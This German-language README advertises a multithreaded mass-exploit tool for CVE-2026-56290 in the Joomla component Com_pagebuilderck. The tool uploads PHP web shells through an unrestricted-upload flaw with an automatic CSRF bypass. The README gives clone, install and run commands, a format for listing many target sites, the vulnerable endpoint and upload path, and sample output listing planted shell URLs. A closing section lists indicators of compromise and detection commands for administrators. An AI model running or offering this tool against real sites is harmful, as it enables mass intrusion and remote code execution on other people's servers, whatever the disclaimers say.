
CVE-2026-56290 – Massen-Exploit für die Joomla-Komponente Com_pagebuilderck (Uneingeschränkter Datei-Upload → RCE). Multithreaded, automatischer CSRF-Bypass, PHP-Shell-Uploader.
Dieses Tool dient ausschließlich Bildungs- und autorisierten Sicherheitstestzwecken.
- Unbefugter Zugriff auf Computersysteme ist illegal
- Verwenden Sie dieses Tool nur auf Systemen, die Ihnen gehören oder für deren Tests Sie eine ausdrückliche Genehmigung haben
- Der Autor ist nicht verantwortlich für Missbrauch oder Schäden, die durch dieses Tool verursacht werden
- Durch die Nutzung dieses Tools erklären Sie sich damit einverstanden, alle geltenden Gesetze und Vorschriften einzuhalten
Weitere Haftungsausschlüsse finden Sie auf der Titelseite von Jenderal92. Sie können sie HIER !!! einsehen
CVE-2026-56290 ist ein Massen-Exploit-Tool, das die Com_pagebuilderck-Joomla-Komponente angreift. Diese Schwachstelle ermöglicht es entfernten Angreifern, beliebige PHP-Dateien über einen uneingeschränkten Datei-Upload-Mechanismus hochzuladen, was zu Remote Code Execution (RCE) führt.
| Attribut | Wert |
|---|
| CVE-ID | CVE-2026-56290 |
| Komponente | Com_pagebuilderck |
| Plattform | Joomla! CMS |
| Typ | Uneingeschränkter Datei-Upload (RCE) |
| CVSS-Score | 9.8 (Kritisch) |
/media/com_pagebuilderck/gfonts/ hochreslt.txtPython 2.7
pip (Python package installer)
Python-Abhängigkeiten
pip install requests colorama
🔧 Installation
git clone https://github.com/Jenderal92/CVE-2026-56290.git
cd CVE-2026-56290
pip install -r requirements.txt
📖 Verwendung
Grundlegende Verwendung
python CVE-2026-56290.py targets.txt
Format der Eingabedatei
Erstellen Sie eine Datei targets.txt mit einer URL pro Zeile:
https://example1.com
http://example2.com/joomla
https://example3.com:8080
# Comments are ignored
Ausgabe
· Konsolenausgabe: Fortschritt und Ergebnisse in Echtzeit · reslt.txt: Enthält alle verwundbaren Shell-URLs
Beispielausführung
$ python CVE-2026-56290.py targets.txt
[+] CVE-2026-56290 - Com_pagebuilderck Mass Exploit
[+] Threads: 15
[+] Timeout: 10s
[+] Output file: reslt.txt
[+] Loaded 100 targets from file
[*] Starting pool with 15 processes...
[1] Queueing: https://example1.com
[2] Queueing: https://example2.com
...
[1] ✓✓✓ VULNERABLE: https://example1.com/media/com_pagebuilderck/gfonts/shell_abc123.php
⚙️ Konfiguration
Sie können diese Variablen im Skript ändern:
THREADS = 15 # Number of concurrent workers
TIMEOUT = 10 # Request timeout in seconds
USER_AGENT = "..." # Custom User-Agent string
OUTPUT_FILE = "reslt.txt" # Output filename
🛡️ Sicherheitshinweise
Für Systemadministratoren
Wenn Sie eine Joomla-Website mit Com_pagebuilderck betreiben:
Indikatoren einer Kompromittierung (IoC)
Achten Sie auf diese Anzeichen einer Ausnutzung:
# Suspicious files in
/media/com_pagebuilderck/gfonts/*.php
/media/com_pagebuilderck/gfonts/*.phtml
/media/com_pagebuilderck/gfonts/*.phar
# Suspicious requests
/index.php?option=com_pagebuilderck&task=browse.ajaxAddPicture&[token]=1
Erkennungsbefehle
# Find suspicious PHP files in the media directory
find /path/to/joomla/media/com_pagebuilderck/gfonts/ -name "*.php" -type f
# Check for recent modifications
find /path/to/joomla/media/com_pagebuilderck/gfonts/ -type f -mtime -7
# Look for suspicious file names (random strings)
ls -la /path/to/joomla/media/com_pagebuilderck/gfonts/ | grep -E '[a-z0-9]{8,}\.(php|phtml|phar)'
⚠️ Rechtlicher Hinweis
Diese Software wird "WIE BESEHEN" ohne jegliche Gewährleistung bereitgestellt. Der Autor ist nicht verantwortlich für eine illegale oder unethische Nutzung dieses Tools. Holen Sie vor dem Testen eines Systems stets eine ordnungsgemäße Genehmigung ein.
🙏 Danksagungen
· Sicherheitsforscher, die CVE-2026-56290 entdeckt und gemeldet haben · Die Joomla-Community für die Pflege des CMS
Denken Sie daran: Mit großer Macht kommt große Verantwortung. Nutzen Sie dieses Tool ethisch und legal.